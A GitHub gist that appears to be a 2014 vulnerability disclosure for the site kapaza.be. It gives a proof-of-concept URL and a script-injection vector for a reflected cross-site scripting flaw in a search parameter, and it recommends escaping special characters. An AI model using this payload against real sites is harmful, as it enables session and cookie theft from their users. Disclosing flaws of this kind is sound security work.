Skip to content

Instantly share code, notes, and snippets.

@MiguelBel

MiguelBel/Kapaza.be

Created December 3, 2014 18:51
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save MiguelBel/c32be0f552b3750f380f to your computer and use it in GitHub Desktop.
Save MiguelBel/c32be0f552b3750f380f to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Kapaza.be
Bypass Google Chrome Auditor: No
Web: http://www.kapaza.be
Vulnerability: Reflected XSS
PoC (Proof of concept): http://www.kapaza.be/nl/li?w=3&q=%3C%2Ftitle%3E%3Cscript+type%3D%22text%2Fjavascript%22%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E+
Attack Vector: </title><script type="text/javascript">alert('xss');</script>
Description: Allows to the user to execute custom javascript code that is used to hijack cookies and sessions.Can be very harmful for someone who have bad intention.
Solution: Escape the special chars '';!--"<XSS>=&{()}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment